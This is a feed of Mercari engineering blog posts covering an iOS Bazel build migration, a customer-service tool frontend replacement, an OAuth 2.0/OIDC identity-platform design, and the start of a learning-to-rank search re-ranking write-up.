This is not necessarily a problem of modularization, as it is often triggered by the increase in the number of Dynamic frameworks (.dylyb + .bundle files). When an application contains Dynamic frameworks, iOS dynamically links them, slowing down the startup time.

On the other hand, if you use a static library (.a files), modules are linked during build time. It adds to the build time, but minimizes the effect on application startup times.

Recently there have been improvements in dyld performance and iOS caching, which made this startup time problem negligible in many cases. However, the same cannot be said for an application like ours that utilizes close to a 1000 modules. In such cases using static libraries is almost a necessity to improve user experience.

The standard way to build modules in Bazel is to build them as static libraries. Even when Dynamic frameworks are used, Bazel properly links them to avoid duplicate symbols and generally avoids bloating the application size. There is a chance for duplicate symbols to exist between an application and its App Extension, as they are bundled as independent binaries. In such cases, it is possible to use a Dynamic framework.

We have observed the startup times of the rewritten application through Firebase Performance Monitoring, and we are seeing that we were able to retain the startup speed comparable to the previous version, even after the aggressive modularization that we have performed.

We are satisfied with the results, as startup speed was something that we had been working on even before the rewrite. Considering the product size, we believe what we achieved is acceptable.

Before the rewrite: 4.106.0 (136002)
After the rewrite: 5.19.0 (207952)

Dependency Management

Bazel does not come with a version-aware dependency manager. To be fair, Bazel is a build system, and not a dependency manager. Bazel has its own philosophy on dependency management, and it seems like it is an intentional choice.

CocoaPods, compared to Carthage and Swift Package Manager, has been one of the most dependable dependency managers within the iOS ecosystem. Initially we used CocoaPods as our dependency manager. For ease of use, we forked CocoaPods and made it possible to generate Bazel’s BUILD file to fetch third party dependencies when pod install command was involved. This worked for a long time, but the cost of maintaining it seemed to overcome the merits as we used fewer third party dependencies. As we were also already using Renovate to automatically update dependencies, we decided that we no longer needed a dependency manager and deleted CocoaPods from our project.

Bazel can easily use and cache external libraries and tools. It only fetches these dependencies only when they are absolutely necessary.

When an external library supports Bazel builds, you only need to declare the dependency in the WORKSPACE file at the project root. For example, SwiftLint supports Bazel.

WORKSPACE

http_archive(
   name = "SwiftLint",
   sha256 = "7c454ff4abeeecdd9513f6293238a6d9f803b587eb93de147f9aa1be0d8337c4",
   url = "https://github.com/realm/SwiftLint/releases/download/0.49.1/bazel.tar.gz",
)

load("@SwiftLint//bazel:repos.bzl", "swiftlint_repos")

swiftlint_repos()

load("@SwiftLint//bazel:deps.bzl", "swiftlint_deps")

swiftlint_deps()

Even when a dependency does not support Bazel, you can write local BUILD files to build them. We do not need to worry about anything when a particular dependency does not natively support Bazel.

WORKSPACE

http_archive(
   name = "lottie-ios",
   build_file = "//Externals/ThirdParty:lottie-ios.BUILD",
   sha256 = "e168b05792d8af1830a73daee2f3b4f3a24b1ec512a949adf60fac6f0b6c99f5",
   strip_prefix = "lottie-ios-3.3.0",
   url = "https://github.com/airbnb/lottie-ios/archive/3.3.0.zip",
)

lottie-ios.BUILD

swift_library(
   name = "Lottie",
   srcs = glob(
       ["Sources/**/*.swift"],
       exclude = ["Sources/Public/MacOS/**"],
   ),
   visibility = ["//visibility:public"],
)

You would need to write these BUILD files for each package for most of the Swift / Objective-C packages as they do not support Bazel out of the box.

You may be able to leverage a tool to automatically convert podspecs from CocoaPods to Bazel build files, such as PodToBUILD, but in our case we manually define them as needed.

This is because we do not often add external packages, and that we think that the tradeoff between having to maintain and learn it, we can explicitly write out how these dependencies are built.

Learning Costs

Bazel’s learning curve is one thing that we need to think about.
The Architect team can decide on the file structure within a project. For example, below is a sample of how files within a module should be placed.

Projects/Libraries/Logger/
├── BUILD
├── Sources
│   ├──Logger.swift
└── Tests
     └──LoggerTests.swift

As long as developers stay with the above rule, developers can simply reuse common Bazel macros, such as the library macro to specify the library target, and the unit_test macro which specifies the test targets. This is actually very similar to how Package.swift works in Swift Package Manager, thus eliminating the need for developers to learn anything new. In most cases, a developer only needs to think about the target name and its dependencies to create a new build target.

load(
   "//BazelExtensions:rules.bzl",
   "library",
   "unit_test",
)

library(
   name = "Logger",
   deps = [
       "//Projects/Libraries/FoundationPlus",
   ],
)

unit_test(target = ":Logger")

Giving back to the community

Bazel is not a first-party build system for iOS. As such, it takes time for new changes to trickle down to Bazel when Xcode adds new features. It’s easy to fork Bazel, or apply patches to build rules as necessary, but we have tried hard to avoid forking or applying hacks to Bazel. We have been working with the community to generalize solutions and give them back to the community. For example, here are some of the contributions that we have made in the past:

Added --@build_bazel_rules_swift//swift:universal_tools flag to provide compatibility between Intel / Apple silicon Macs. Pull-Request
Add apple_dynamic_xcframework_import and apple_static_xcframework_import to officially support XCFrameworks. Pull-Request
Made it possible to pass arguments to CommandLineArguments through test_arg to allow setting the language used during visual regression testing. Pull-Request

Future Works

We were able to greatly improve the performance and stability of our builds by using Bazel. We intend to keep optimizing our productivity by eliminating bottlenecks and taking modularization even further.

We are looking for developers who want to help improve our build environment, and developers who want to help us grow Mercari with us!

Software Engineer, iOS – Mercari

Mercari Customer Service Tool’s Frontend Replacement Project

Tue, 31 Jan 2023 16:27:16 GMT

This article was written as "Series: The Present and Future of the RFS project for strengthening the Technical Infrastructure” and a translation of the Japanese article published on January 12th, 2023.

I’m @AHA_oretama from Mercari JP’s CS Tool team.

Our team has been developing the CS Tool (Customer Service Tool) for many years. In order to eliminate the debt accumulated in the process, we launched a project to replace the frontend, and have been working on replacing one particular screen in a period of about three months as a PoC (Proof of Concept). In this article, I would like to introduce the origins of the CS Tool frontend replacement project, and the development of the replacement as well as its results so far.

If you are interested, please take a look at the following articles about the CS Tool team’s other initiatives (articles are in Japanese).

“Efforts toward loosely coupled DB in the Mercari CS tool" by @hukurou
“How we solved the system problems we discovered during the GKE migration" by @monkukui

Issues to be solved in the existing CS Tool

Technical Debt in the CS Tool Frontend

Development of the CS Tool began before the launch of the Mercari Application, and many functionalities were added over time. On the other hand, there was a long period of time when there were few engineers in charge of the CS Tool, and not much maintenance and improvement was done. As a result, the CS Tool accumulated a lot of technical debt and became very difficult to maintain, especially the frontend.

The main liabilities was that there were multiple different frameworks used in the frontend depending on when it was developed, and they were all mixed together: Twig, a PHP template engine; tupai.js, an OSS frontend framework; and React, which was introduced several years ago as a part of previous replacement process. The mix of these three has increased the amount and breadth of knowledge required to work on the codebase, making modifications more difficult.

The use of tupai.js is especially painful, as the OSS itself has not been maintained for many years, making it not only impossible to update the surrounding libraries, but also to install new libraries (e.g. TypeScript, Testing Library, etc.). In addition, there is not much documentation or knowledge available on the library, making it even harder for new members to work on screens that use tupai.js.

The poor local development experience is also a major liability: the CS Tool frontend and backend are very tightly coupled, and the frontend cannot be run unless the backend is started. The backend also depends on several other services and cannot be started locally. Therefore, frontend modifications are uploaded to a shared development server, which significantly reduces the Developer Experience (DX).

One final and major liability is that we cannot write tests. As mentioned earlier, tupai.js is currently not maintained, so the Testing Library (React Testing Library in the case of React) cannot be installed. This makes it very difficult to write tests for the tupai.js code. Also, the React component, which was partially replaced a few years ago, can work with the React Testing Library, but the React component in the CS Tool itself was not designed to be testable, so it is also difficult to write tests for this component.

Unlifted CodeFreeze and problems with Microservice Migrations

One of the major issues other than technical debt is the continuing CodeFreeze. In recent years, Mercari has been promoting the company-wide shift to microservices, and the CS Tool has also been converted to microservices in the same way. If we work on microservice migration while more functionalities are added or existing functionalities are being modified, the scope of microservices will continue to increase as modifications are made to the existing CS Tool, and there is even a possibility that the microservices will never be completed. In order to avoid such a situation, we have decided to prohibit modification of all code in the CS Tool in principle at the start of the microservice conversion. We call this CodeFreeze.

We have been in CodeFreeze for several years now, and during that time we have been working on microservices, but at present we have only microserviced a few functionalities out of the dozens that already exist in the CS Tool. If we continue with the microservice migration this way, it is expected to take 10 years, during which time it is unrealistic to continue with CodeFreeze.

In the past, the CS Tool microservice migration was done by carving out the domain into a single application and redefining the screens and specifications from scratch. However, there were several problems with this approach.

Redefining specifications incur significant development costs
This workflow required changes in customer service operations using the CS Tool, and the transition would have been very costly.
Customer service personnel would have to work with multiple applications that have been carved out on its own.
By definition, the most of microservice migration is concerned with the backend, but our workflow involved both frontend and backend, which necessarily increased the scale of the problem.

As you can see, this approach was one of the major factors that prolonged the Microservice migration.

The Choice of Frontend Replacement

As we have described, we still faced some major problems. At the end we decided to tackle this by replacing the whole frontend. We will explain some of the reasons behind this decision.

One is that all of the technical liabilities listed above could be eliminated by replacement. Most importantly, three mixed frontend frameworks can be unified into one modern framework, which in turn should bring improvements on reducing learning hurdles, DX, and testability.

The second is the establishment of new CodeFreeze release criteria. Up to this point we required ourselves to finish the microservices migration before lifting the CodeFreeze. Since we expected this to take around 10 years, it was no longer realistic, and thus we needed a new set of requirements. We decided to lift the code freeze upon the completion of the frontend replacement, which we expected to finish in a relatively short amount of time.

Third, the replacement of the frontend would be a way to address most of the problems of the Microservice migration of the CS Tool to date.

The replacement effort would maintain most of the previous specifications and designs, and thus development costs would be relatively low
Customer service personnel would not need work with multiple, separate applications
We would be able to focus on work on the backend once the frontend replacement was done.

And last but not least, we also found that in general costs to replace frontend components were lower than expected.The GroundUp Web project replaced Mercari’s Web service over a year of development, as described in "The Four-Year history to migrate Mercari Web to Microservices,” and this showed us how long a large scale frontend replacement would take. The CS Tool’s frontend code footprint was only about 1/10 of the code that GroundUp Web replaced. Although this is not an easy estimate due to differences in staffing and original functionality, we could see the possibility of replacing it in less than six months if we were only looking at replacing a codebase that was 1/10 in size.

How I launched the Project

This section describes the origins of the CS Tool frontend replacement project.
I joined the CS Tool team last year, and after an onboarding period of about 1-2 months, I began to develop as part of the team in earnest. During the six months or so of development, I began to feel the development experience and quality was poor. It was easy to see that the cause of this was due to the liabilities mentioned above. From there, I spent my spare time searching for ways to alleviate or resolve the debt issues. After some research, I came to the conclusion that replacing the frontend was a realistic solution, so I compiled my findings and suggestions for replacement into a Design Doc.

The Design Doc was first shared with the team, and then Camp (the team’s upper organization), and we were able to get general support for the replacement proposal. I think that the fact that we explicitly mentioned the short-term goals of the projects (allowing us to forecast how much actual work would be necessary) was one of the factors that made it easier to gain support for the proposal. The short-term goal was to replace one screen in about three months as a Proof of Concept (PoC), and based on the results of the PoC, we decided to determine whether to expand the replacement to all screens in the future. I also feel that Mercari’s "Go Bold" culture was a catalyst to encourage this kind of proposal to go forward.

This is how the project began, and to date we have been building the infrastructure (implementing the Strangler pattern described below) and replacing one screen in a period of 3 months, give or take, as a PoC. At the time of writing this blog, the actual development work is almost complete, with only a release and PoC review to be done.

Actual Development process

We started out by deploying a proxy server in front of the existing CS Tool service so that traffic to the existing CS Tool service could be maintained and only selected requests could be proxied to the frontend service that was being replaced. This is known as the [Strangler Pattern], a technique for gradually replacing legacy services with new services.

admin-gateway: Service to manage access to Mercari’s internal services such as CS Tool.
CS Tool: Existing CS Tool, providing frontend and back-end.
new proxy: Proxy server newly introduced this time
new frontend: Frontend after replacement

The replacement frontend service is a Single Page Application (SPA) and delivers assets from a pod on Kubernetes (K8s). The new frontend service was deployed on k8s in order to restrict access such that it only accepted traffic from admin-gateway. We also had prior experience implementing a similar architecture.
These are the main tools that we used in frontend development.

I will discuss some of the results and impressions of using these in the next section.

Effects after the replacement

As originally intended, the replacement has yielded significant improvements in the first two areas of liability. In particular, the improvements on development productivity and quality were significant.

In terms of development productivity, we have introduced two mechanisms that allow the frontend to be launched in a local environment, enabling local development and dramatically increasing development speed. One of these mechanisms is to connect to the API server of a shared development environment and launch the frontend in a local environment, although some preparations (cookie settings, VPN settings, etc.) are required before launching the frontend. The other is to use a Mock Service Worker to communicate with the mocked API. The advantage of the latter is that everything is done locally, so there is no preparation or connection to the outside world.

In terms of quality, CI was introduced from the early stages of development, and a system was established to ensure quality by running unit tests and linting. Although most of the team members did not have much knowledge of frontend testing, they made sure to write unit tests, which was very important.

In addition, the introduction of TypeScript had several positive effects.It clarified the fields of the API actually used in the frontend, which is something that we can use to improve the back end API in the future. It reduced the number of requests and improved performance by introducing SWR. It allowed us to deepen our understanding of the specifications of the screens being developed through the development.

The most difficult part of this project was our own lack of knowledge and experience in frontend development. Since most of the team members had no experience in frontend development, it was very difficult to catch up on that part, and it took longer than expected. To address this problem, the team held 30 minute study sessions twice a week to share knowledge and experiences. It started with a study session on Tailwind CSS, and we plan to continue these sessions, covering testing and React in the near future.

Summary

The CS Tool has been in development since before the launch of the Mercari application, but it has accumulated a lot of debt, especially in the frontend. In response, we proposed replacing the frontend and have replaced one screen as a PoC. The development of the new frontend is much better than the current CS Tool, and has greatly improved development productivity and quality.

At the time of this writing, our only task that is left is to release the results as a PoC, and perform a review/look back on our work. We intend to review the PoC, and based on our findings will correct our schedule and expectations in preparation to replace the entire CS Tool frontend. We do not yet know how far we will go in replacing the CSTool frontend or how many months it will take, but we hope to share the status of the frontend replacement through blogs such as this one.

Currently, Mercari is looking for colleagues to work with us on a company-wide cross-functional project called "Robust Foundation for Speed" to solve the technical challenges of Mercari’s common business infrastructure! If you are interested, please see the following link.
Software Engineer, Backend Foundation (PHP/MySQL) – Mercari
Software Engineer – Mercari

Applying OAuth 2.0 and OIDC to first-party services

Mon, 30 Jan 2023 15:53:51 GMT

This article was written as part of "Series: The Present and Future of the RFS Project for Strengthening the Technical Infrastructure".

Hello, I’m a member of the ID Platform team at Mercari. In this article, I will describe how we are applying the OIDC / OAuth 2.0 standard specifications to build our identity platform for our first-party services.

Introduction

Mercari is known as the biggest C2C flea market platform in Japan. But it also has multiple subsidiaries companies like Merpay, Souzoh, and Mercoin, … Because of different business requirements and development styles, each company’s systems are being run on different server clusters. But they still need to call each other to process requests from clients. How we perform cross-cluster communication is an important system design decision.

As with any other system, authentication and authorization are essential parts of our system. At Mercari, we have a single ID Platform team whose main responsibility is to oversee the authentication and authorization of the group-wide system. And to support business growth, we have to build a strong, reliable but yet easy-to-use ID platform.

Instead of making in-house specifications, we always try to apply industry-standard specifications which are well-defined and proven. Usually such specifications are well-thought out, and following them help us do the Right Thing, as well as reducing the possibility of introducing security risks. OAuth 2.0 and OIDC are well-known protocols in the digital identity field. Although they were designed mainly for delegating access and providing user identity to third parties, we tried to apply those specifications to our first-party services because we believe that they will help us to build a clean, secure and sustainable IDP. In this blog post, we would like to share something about that story.

There are many documents about OAuth 2.0 and OIDC. You can find some links in the reference section.

Overview of the Mercari system

Here is a very brief chart about the Mercari system.

The Mercari core system provides the core features of our service like buy/sell items and pay for them. It was built for a long time. And with the establishment of subsidiaries, we are adding more and more subsystems. There are two kinds of subsystems, which run on their own cluster:

A subsystem (subsystem 1 in above diagram) that bidirectionally interacts with the core system, and also called directly from the Mercari mobile apps and web. Requests to this subsystem are authenticated by IDP.
A subsystem (subsystem 2 in above diagram) that only calls the core system, and has its own clients. Technically it can be considered a third party service, but it’s owned and managed by the Mercari group. Requests to this subsystem are not authenticated by IDP. The subsystem has its own authentication mechanism, and their clients do not use the tokens issued by IDP to access the servers.

Considerations

Decide responsibility

The three main components in OAuth 2.0 / OIDC specs are the Authorization Server (AS), the Resource Server, and the Relying Party. The Relying Party gets the token (access token and ID token) from the Authorization Server and accesses the Resource Server if needed. In order to apply those specs, we need to map our components to those from the standard. We only have 1 authorization server in our system, so it won’t change. Also, the authorization server only issues 1 type of token (legacy token types that were created before having the current authorization server still exist though). It eases the authentication and the application of restrictions.

To decide which component should bear the responsibility of the Resource Server and the Relying Party, we followed below principles:

The Resource Server holds the resources
The Relying Party is granted access to the resources from the Resource Server
At the same time, a subsystem can be both Resource Server and Relying Party because it can hold some resources and requests other resources from other subsystems. But in the context of 1 request, the responsibility of the subsystem (Relying Party or Resource Server) should be cleared.

Grant type

After mapping the components, we have to think about how the Relying Party obtains the access token, or in other words, we need to choose which grant type should be used for each scenario. There are 2 cases:

Relying Party works on behalf of the users (so-called user context)

There are 2 sub-cases:

Relying Party receives instructions from the users directly (mobile app/web in the above diagram)
The authorization code grant should be used. One noticeable thing here is because the Relying Party is a first-party service, we don’t need to show the authorization screen to the users.
Relying Party doesn’t receive instructions from the users directly (subsystem 1 in above diagram)
This case happens when a subsystem can be a Relying Party and a Resource Server at the same time. As an Resource Server, it receives the call from an Relying Party and becomes an Relying Party when making the call to another Resource Server, in order to process the request from the initial Relying Party. For this case, we use the token exchange grant to exchange the token from the initial Relying Party for a new token to call another Resource Server.

Relying Party works on behalf of itself (so-called service context)

One example is when a batch job is run. The Relying Party doesn’t receive any requests from the users but some processes still need to be done. In this case, the client credentials grant should be used.

Scenarios

Based on the above principles, we divided our system into 3 scenarios (※1, ※2, ※3 in the below diagram)

First-party app/web (※1)

In this case, the first-party mobile applications and websites are the relying parties. The resource server includes the core system and the subsystem which is being called by the Relying Party.

In this scenario, the mobile apps and web obtain the access token (AT) from the authorization server by using the authorization code grant type (the grant flow has been omitted). But since users don’t delegate their access to third-party services, the authorization screen is skipped.
We don’t have the service-context access token for this scenario.

The subsystem acts as a relying party only (※2)

This scenario is for a special kind of subsystem (subsystem 2 in the above diagram). It’s outside of the IDP-protected area. It has its own clients and authentication mechanism. And it calls the core system that is protected by IDP, but the opposite doesn’t happen. From an IDP point of view, it works like a third party application but is managed by the Mercari group. The difference with scenario ※1 is the subsystem is run in a cluster of servers, not in clients like mobile apps or webs.

In this case, the subsystem becomes the Relying Party, and the resource server is the core system only. In order to get the access token (user context), the authorization code grant type, which is initiated by the backend, is used. The authorization screen is also being skipped for this case. For the service context access token, the client credentials grant type is used.

The subsystem acts as a relying party and a resource server (※3)

There is another kind of subsystem (subsystem 1 in the above diagram). It’s inside the IDP-protected area, which means the authentication is being done by using the tokens that were issued by Mercari IDP. Its callers can be both first-party clients (mobile app/web) and other subsystems. It also needs to interact with other subsystems (including the core system) inside the IDP-protected area, which means it needs to get the token from IDP and call others. Thus the subsystem acts as Resource Server when it provides resources, and acts as Relying Party when it uses resources from other systems.

To get a user-context access token, the subsystem needs to perform a token exchange flow. The flow will create a new access token based on the original one.

(More details will be provided in another article from our team)

To get a service-context access token, the client credentials grant is used.

UserID

The UserID is another interesting point to consider. The UserID is referenced everywhere in our system. It exists as part of request parameters. It is also the primary key of many tables in our DBs. At Mercari, in order to minimize the effect of data leakage and for better privacy (data unlinkability), we use separate UserIDs in each subsystem.

As you can see in the diagram below, UID1 is used inside the core system, and UID2 is used inside subsystem 1. Subsystem 2 (outside of the IDP-protected area) can have its own internal UserID structure also.

But then how do subsystems call each other? Here, we applied another thing from OAuth 2.0 and OIDC, the pairwise pseudonymous identifiers (PPID).

PPID is an Identifier that identifies the Entity to a Relying Party that cannot be correlated with the Entity’s PPID at another Relying Party.

This means that given a user, different identifiers are issued by the authorization server to each OIDC client. In order to interact with the authorization server, each Relying Party is issued an OIDC client, and PPIDs are issued to these OIDC clients. Then Relying Parties can use these PPIDs to call Resource Servers.

On the Resource Server side, we have to convert the PPIDs from the Relying Party to the internal UserID when receiving the request and convert the internal UserID back to PPIDs when returning the response. In order to do that, each subsystem maintains a mapping between the internal UserID with its own PPID (each subsystem is also an Relying Party, so it has its own OIDC client, and its own PPID). Conversions between PPIDs are done by the authorization server.

An Relying Party-only subsystem (subsystem 2) doesn’t have the ability to convert PPIDs. It only needs to know its own PPIDs. But the subsystem that can serve as both Relying Party and Resource Server (subsystem 1) must have the ability to convert not only its own PPIDs but also PPIDs that were issued to others. So when calling other subsystems, this type of subsystem can technically use multiple types of PPIDs. In order to make it clear and consistent across subsystems, there is an important rule that we have to follow: always use the PPID issued to the Relying Party for Relying Party – Resource Server communication. As you can see in the above diagram, instead of using the same PPID, subsystem 1 uses PPID 4 (issued to subsystem 1) to call the core system, and the core system uses PPID 5 (issued to the core system) to call subsystem 1.

Asynchronous communicationAsynchronous communication

Up to this point, we’ve only talked about synchronous communication between Relying Party and Resource Server, in which Relying Party acts on the resources from Resource Server. But we also have another communication paradigm in which the resources are pushed from Resource Server to Relying Party when an event occurs.

Normally, in order to receive events from Resource Server, the Relying Party needs to register a webhook URL to the Resource Server. When the webhook is called, the Relying Party needs to verify the caller to ensure that the Resource Server is a legitimate publisher. This also means that some sort of credential must be attached to the call. Also, the event is likely to be triggered by user actions, so the UserID is likely to be available in the event message.

Given the above, we decided to use the UserID inside these messages as the PPID issued to the Relying Party. This means the Resource Server has to convert its internal UserID to the Relying Party-PPID before publishing the event.

And for the caller verification, we considered what kind of token should be used. Theoretically, since only the Resource Server has the ability to verify the access token, the Relying Party would not be able to perform this task. For subsystems that can be Relying Party/Resource Server at the same time, technically they can verify the access token but we shouldn’t use the access token for sending the event because other Relying Parties can’t verify it and we will end up in an inconsistent system. In our opinion, the event receiver should only verify the event if it came from a legitimate publisher. Therefore a verifiable ID token was the way to go.
After making these decisions, we were able not only to perform asynchronous communication between first party subsystems, but also to do the same for third party services as well, e.g. providing security events to the services that use Mercari ID Login.

Conclusion

By examining our system from the OAuth 2.0 / OIDC perspective and mapping system components to their components, we had a clearer understanding of what we should do, which helped us to design the system and prevent incorrect usage. It’s tempting to create in-house specifications, especially if it’s for first party services, but over time custom specifications tend to become complicated, even to the point of being out of control, as well as having a high chance of containing security holes.

We have just started the long journey, and our ID platform is still immature. But with current features, it can already support our current business growth. The auth mechanism would already be there even if a new subsidiary company joins our group. We only need to apply one of the above scenarios for the new business. This scalability was one of the main reasons why we started to build our ID platform, much like our other infrastructure-related projects.
This article skimmed over many parts, but if you found this article interesting and are interested in working together on authentication and authorization for the whole Mercari group, please take a look at our careers page!
Software Engineer, Backend (ID Platform) – Mercari

References

The Journey to Machine-Learned Re-ranking

Sun, 01 Jan 2023 14:24:46 GMT

The Journey to Machine-Learned Re-ranking

Search is the most fundamental way users discover what Mercari marketplace has to offer; our users rely on search to find the items they want. This core functionality is powered by a traditional text matching information retrieval system.

But recently, we asked ourselves: Is there a reasonable machine-learning based approach that could improve the search experience for users? This led to more questions: Could we capture Mercari users’ interactions as a hint about what search results are more relevant to them? Can we build a more informative context for the model to learn from by labeling our training data and keeping in mind the limitations of standalone user clicks? How can we use data labeling to help us capture the relationship with our business KPIs?

It has been a long, challenging, and interesting journey, with a lot of lessons along the way. Through the efforts/developments described in this article, we achieved a statistically significant shift in the business KPIs and now our model is powering 100% of production traffic for the “best-match” (おすすめ) search flow. But that’s just the beginning, and we are just getting started!

The state of search as of April 2021

Search at Mercari is powered by an information retrieval system based on Elasticsearch’s text matching. By default, Elasticsearch leverages a ranking algorithm called Okapi BM25. The BM25 algorithm considers how many words in a given query match the fields being searched over in the index, where rarer matches and matches over shorter fields contribute to a higher relevance score.

However, Mercari uses a custom ranking approach: Mercari Search does not leverage out-of-the-box BM25; instead, it uses its own definition of a ranking function that puts emphasis on item freshness (i.e.: recency boosting hereafter). Depending on the search flow type at Mercari, the query matches are then ordered in a variety of different ways, in order to provide a search experience which is important to our users. For example, two common search flows are the “newly posted” (新しい) and the "best-match" (おすすめ) items. The "best-match" ranking also incorporates recency boosting (i.e.: when was the item/listing created), as we want to avoid including older items that have a higher similarity score at the top of the search result set.

Historically, there were also a number of machine learning ranking attempts to provide a better Search user experience to our Mercari end-users. While some of these attempts were more successful than others (as shown by the past A/B experiments), these successes did not translate to statistically significant improvements in business KPIs.

The reader should bear in mind that the current blog post focuses on one particular past effort to improve accuracy of search results via the application of machine learning techniques. The focus of this effort was to improve a search behavior that we refer to at Mercari as "best-match" (おすすめ) flow. Here, "best match" means a higher similarity score between a query and a document, as determined by the ranking function of the text-matching information retrieval system.

Building upon regular text-matching system capabilities

Text-matching information retrieval systems these days are fast and powerful when providing full-text search capabilities. Some may even leverage natural language processing (NLP) capabilities which employ text embeddings represented as numeric (dense) vectors to capture the linguistic content of the text, and can be used to assess semantic similarity between a query and a document.

Although powerful, such systems are still limited in terms of what signals can be captured, in addition to the indexed content. Our users tend to use Mercari Search in various ways, based on their search behavioral habits, for example:

What products they like to shop for and look at
How deep into the search results they like to scroll
How many results from the presented result set they actually preview
How long they dwell when viewing item details
and other business interactions, etc.

In addition to buyers, sellers also use search to determine the reference price of items they want to sell. They do this by checking for sold out items in the search results.

Regular text-matching systems normally do not capture such implicit and explicit user signals, which can serve as potential signals to improve relevance or personalization of the search results, as perceived by our users.

If we want to improve the relevance of search results that the information retrieval system gives us, we need to apply some sort of post-retrieval processing to optimize the order of the items shown to the end user. An approach to this, which is used widely in the industry by information retrieval / recommender systems, is to leverage machine learning for post-retrieval processing, i.e., re-ranking.

This is actually a fairly common information retrieval system architecture: there is a first phase retrieval where we get an initial result set from the text matching system (e.g.: Elasticsearch, Solr, etc.). This is the “recall” phase, which can be expressed using the following question: “Have we retrieved all the relevant documents for our query”? Then, there is a second phase which does post-retrieval processing of the search results through the application of machine learning (i.e.: for the purpose of re-ranking). This is our “precision” phase, which can be expressed using the following question: “From the documents we have retrieved, which ones are relevant”? In other words, precision is the subset of the retrieved documents that are relevant to the query.

Learning-to-Rank – Theory and challenges

We decided to leverage a Learning-to-Rank (LTR) machine learning approach to add a post-retrieval processing to the search results retrieved from the index, which leverages various signals from Mercari user behavior. LTR is a class of machine learning algorithms that learns how to rank (i.e.: reranks) search results automatically given a query & a set of documents using additional signals about the search.

Liu et al. (2009) defines LTR as “… a task to automatically construct a ranking model using training data, such that the model can sort new objects according to their degrees of relevance, preference, or importance.” [1]

Traditionally, it is a supervised machine-learning task which produces a scoring model, where the training data consists of queries and their respective document results. During a training phase where some sort of ranking loss is minimized, the model learns to predict a relevance score for each input x = (q, d), where q is a query and d is a document. The relevance score represents the importance of the document’s relevance with respect to the query.

As mentioned earlier, we constructed a model to predict a relevance score for each document. Motivated by inference speed, we settled on an architecture based on a small multi-layer perceptron that maps document features to a single score value. To maximize the use of our data, we trained this model using a listwise loss function that approximates nDCG [5]. At inference time, we execute the model over each query-document pair and sort the documents based on the scores given by the model. This effort was not without any challenges though, which we had to address along the way.

Challenge 1: Dataset labeling

For our learning to rank approach, we require labeled data to train our model. One option is to explicitly annotate a set of search queries and results from our logs, where each item is judged by a human annotator and assigned a relevance score. However as one can imagine this is quite a costly and time consuming process, and not guaranteed to produce sufficiently good labels (of course, annotated datasets are valuable in their own right and have an important place in research!).

For example, some of the limitations of annotated datasets are that they are stationary (i.e.: once created, a dataset does not change) and won’t include any future changes in relevancy by integrating a fresher intent (Lefortier et al., 2014) [2]. Another drawback is they may not necessarily align with the actual user preferences, i.e.: annotators and users often disagree (Sanderson, 2010) [3].

Another more scalable approach is to learn from Mercari user interactions (i.e., behavior) with the search results which can be indicative of their preferences. This brings its own difficulties which are discussed further.

Challenge 2: Using clicks to automatically generate good labels

User clicks (i.e.: human interactions with the search results) can be one of the obvious signals to use as labels, but unfortunately it is not always the best/right choice, depending on the business domain and the data corpus.

Clicks are noisy

Unfortunately, in a C2C marketplace, clicks alone are not a strong enough signal to help the model learn what’s important. The problem here is that in general, human users create a lot of “noise” when browsing via clicks – humans often click for unexpected reasons! Often users do not know what they want and they spend a lot of time looking and browsing products. As a result, many items get clicked on, but not that many get purchased. When a click occurs, it does not mean that it happened because of relevance. The opposite is also true: often clicks do not occur despite items being relevant, thus, the model cannot learn much from such a noisy signal — or whatever it does learn can detrimentally affect various business KPIs, such as those tied to sales!

In addition to these points, there is another factor: bots. In any web service, the possibility of automated scraping / bot activity is present. There are many cases of user activity in our client logs being attributed to bots. However, we are fortunate at Mercari to have a huge user base, and consequently a vast collection of client logs to use. Therefore, we take the conservative approach of filtering out search sessions that only contain clicks from our training data. We found this improves model quality by allowing the model to learn from users who had strong intent on searching for and purchasing items on our marketplace.

Clicks are biased

Often, human interactions with the search results are affected by factors other than their relevance. There are a number of problems here, like position bias, where higher ranked results get more attention (thus during user interaction data logging, those results are considered as more relevant); interaction bias, where user interaction is limited to the presented search results; presentation bias, where users interact differently with results presented differently, etc.

We would like to segue for a moment here and touch more on position bias, as we feel often this problem gets overlooked. Position bias leads to another problem called selection bias, where models are effectively trained on biased historical data, which causes bias to be perpetuated via a self-reinforcing feedback loop.

To elaborate on this more, imagine a scenario where most of the time, clicks occur in the top 20 search results. After historical click log collection and curation, the model is trained on a dataset using those clicks as labels, evaluated online via an A/B test, and then retrained using newer data that contain the same click position bias; thus, the loop. This may cause items which are more relevant but shown in lower positions to not improve their rank, due to getting a lower user engagement.

Clicks are a weak signal vis-à-vis e-commerce business KPIs

Clicks alone may not be an informative enough signal that the model can learn from. Of course, this depends on what ranking problem we are solving, the information retrieval system business domain, and the data corpus. For example, in a web search, clicks would be one of the better signals to use when judging what can be relevant to the user, as clicks (and their derived metric click-through-rate) can also be used to measure user engagement. But, in a C2C marketplace, clicks alone won’t provide enough context to model why users buy what they buy.

Challenge 3: Capturing rich context about item relevance from user activity in a label

To provide a rich context for the label, we came up with the concept of a user-item engagement journey. The item engagement journey starts when the user clicks (previews the product details) on an item. But, what happens after the click? Does the user put a “like” on the product? Does the user make a comment? Does a user initiate a purchase process? With this in mind, we came up with the notion of a graded relevance label, instead of the binary label “clicked” or “not clicked”. Our “holy grail” final business event that would represent the notion that the “item engagement journey has finished” is an item purchase event.

We assigned a score to different item activity events in Mercari, where click had the lowest score and purchase had the highest. Thus, if an item had a click, a “like”, and then was purchased, in our training dataset, the label for that item was the score of the purchase event.

Of course, there are different ways to compute the “graded” value, and by no means is our approach exhaustive. For example, as a different approach, we could assign a cumulative sum of different event scores as the final label score and experiment with that. Instead, we decided to start simple and used the highest event score within the events that occurred on the item in the item engagement journey as the label value (which may or may not be an item purchase event).

This has also allowed us to better capture the relationship with business KPIs when labeling the data, thus making our labels more meaningful and informative to provide a much richer context for the model to learn from.

We would like to point out here that the “graded relevance” concept is not a novel thing that we came up with. It is fairly common practice in the information retrieval industry to leverage multiple signals when labeling the data.

Challenge 4: Quality data features are essential

Naturally we want to give the model as much data as possible for it to score each document. We leverage features readily available in our Elasticsearch index, and we also store additional features in a feature store (i.e.: Redis) that we update daily. Namely, these dynamic features are item click-through rate (CTR) and impression probability (an "impression" is an item that was rendered on the user’s device visible pane), and they provide strong signals for our ranking model. For each item, its impression probability is defined as the item’s number of impressions divided by the total number of item impressions over all items for a particular time period, and is designed this way to take into account the fact that user activity on our service is not constant.

